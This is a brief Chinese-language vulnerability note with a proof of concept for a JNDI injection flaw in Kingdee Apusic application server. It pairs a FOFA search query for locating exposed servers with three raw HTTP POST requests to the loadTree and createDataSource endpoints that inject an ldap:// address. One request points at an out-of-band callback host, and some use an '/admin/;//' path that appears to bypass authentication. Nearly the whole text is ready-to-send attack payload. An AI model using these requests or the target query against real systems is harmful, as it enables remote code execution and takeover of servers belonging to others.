金蝶Apusic应用服务器loadTreeJNDI注入漏洞

金蝶Apusic应用服务器loadTree JNDI注入漏洞

fofa

app="Apusic应用服务器"

poc

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
host:127.0.0.1

jndiName==ldap://地址



POST /admin/;//protect/jndi/loadTree HTTP/1.1
host:127.0.0.1

jndiName==ldap://地址



POST /admin/;//protect/datasource/createDataSource HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 260
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded

name=nobg7&jndiName=ldap://cm38sdn1l3f79d1jb0jgoahe856jrdjkg.oast.site/ahsdhashduqwe&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=nobg7&userName=nobg7&password=nobg7&repassword=nobg7&connectionURL=sdasd&driverClassName=java.lang.String&testCommand=

##漏洞来源

• https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw